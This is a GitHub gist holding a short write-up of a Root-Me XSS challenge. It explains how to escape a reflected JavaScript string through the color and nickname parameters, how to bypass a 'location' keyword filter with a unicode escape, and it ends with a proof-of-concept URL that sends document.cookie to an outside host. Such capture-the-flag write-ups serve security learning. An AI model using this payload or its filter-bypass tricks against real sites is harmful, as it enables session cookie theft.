Skip to content

Instantly share code, notes, and snippets.

@myuyu
Last active May 6, 2021 00:21
Show Gist options
  • Save myuyu/7dd93a52d6e9a1566783fecbf0b05365 to your computer and use it in GitHub Desktop.
Save myuyu/7dd93a52d6e9a1566783fecbf0b05365 to your computer and use it in GitHub Desktop.

I noticed that color Parameter can contain any chars which this is useful to get out of the scope of variable color=" , but it's limited it reflect only 3 chars

And because the value of nickname parameter is being reflect after the color we can benefit from that by making anything after color as comment until we reach the value of the nickname parameter color="/*&nickname=*/

And then we can use , to add our malicious code with window.location but the application convert location word to ( ͡° ͜ʖ ͡°) , There's a way to bypass that through use escaped unicode for a specific char in location word which will be converted to the origin format by the Javascript itself ( because () %60 and some other chars are blocked so location is better choice )

Unfortunately the double quotes and single quotes and %60 are blocked by the application so we cannot use them to assign our host as a value to location but fortunately in the javascript /Anything/ is consider as "/anything/" so we assign our host to location through /\0u.ma?cookie/+document.cookie

POC : http://challenge01.root-me.org/web-client/ch24/?nickname=*/},locati\u006fn=/\google.com?a=/%2bdocument.cookie,{//&color=%22/*&p=game&win=x

@j4k0m
Copy link

j4k0m commented May 5, 2021

alt gif

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment